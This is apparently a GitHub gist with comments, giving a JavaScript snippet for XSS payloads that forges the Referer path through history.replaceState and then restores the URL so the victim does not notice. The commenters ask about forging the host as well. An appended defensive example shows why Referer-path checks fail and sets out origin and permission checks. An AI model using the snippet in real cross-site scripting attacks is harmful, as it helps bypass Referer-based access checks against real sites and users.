Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value
// NOTE: this assumes you're using some xhr request, adjust
// based on whatever your XSS payload is actually doing
xhr.send(body);
// Restore the URL value to the original one before
// the XSS victim notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch);
hoodoer (Author) commented Oct 6, 2020

A blog walking through this in use can be found at:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/

alkanna commented Feb 7, 2021

Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the referer using JavaScript?
There is a URL I need to be able to access directly, however, the target host does not let me access it directly unless the referer is said host.

hoodoer commented Feb 7, 2021

@alkanna I'm afraid not, just the relative path.

hoodoer commented Feb 11, 2021

@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but might be possible. Would be fun to play with for sure.

iamajithkumar commented Jun 7, 2021

Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?

hoodoer commented Jun 7, 2021

> Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?

I'm afraid not, you can only control the relative path under the host.
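
Seen from the server side, the behaviour discussed in this thread (page script can set the Referer path but not its host) means a path-based Referer check is not a control. The following is an added example, not part of the gist or of any comment, contrasting that check with an origin-plus-authorization check. `EXPECTED_ORIGIN`, the session fields and the sample request are assumptions made for illustration.

```javascript
// Added example, not from the gist. EXPECTED_ORIGIN, the session shape and
// the sample request are constructed for illustration.
const EXPECTED_ORIGIN = 'https://app.example.test';

function parseUrl(value) {
  try { return new URL(value); } catch (e) { return null; }
}

// Weak control: treats the Referer path as proof of which page sent the
// request. Same-origin script can set that path with history.replaceState.
function weakRefererPathCheck(headers, requiredPath) {
  const ref = parseUrl(headers.referer || '');
  return ref !== null && ref.origin === EXPECTED_ORIGIN &&
         ref.pathname === requiredPath;
}

// Corrected control: use only the origin (which page script cannot change)
// as a cross-site filter, and decide authorization from server-side state.
function assessRequest(headers, session, permission) {
  const flags = [];
  const src = parseUrl(headers.origin || headers.referer || '');
  if (src === null || src.origin !== EXPECTED_ORIGIN) {
    flags.push('cross-origin-or-missing-source');
  }
  if (!session.permissions.includes(permission)) flags.push('permission-denied');
  // Detection signal. Assumes a server-rendered site where every legitimate
  // Referer path was first fetched by the same session (noisy on SPAs).
  const ref = parseUrl(headers.referer || '');
  if (ref !== null && ref.origin === EXPECTED_ORIGIN &&
      !session.servedPaths.includes(ref.pathname)) {
    flags.push('referer-path-never-served');
  }
  const allow = !flags.includes('cross-origin-or-missing-source') &&
                !flags.includes('permission-denied');
  return { allow, flags };
}

// Constructed sample: a session that only ever loaded /profile sends a
// request whose Referer names an admin page it was never served.
const sampleSession = { permissions: ['profile:edit'], servedPaths: ['/profile'] };
const sampleHeaders = {
  origin: 'https://app.example.test',
  referer: 'https://app.example.test/admin/users',
};
```

The `referer-path-never-served` flag is a logging signal only; the allow decision rests on the origin and the session's permissions.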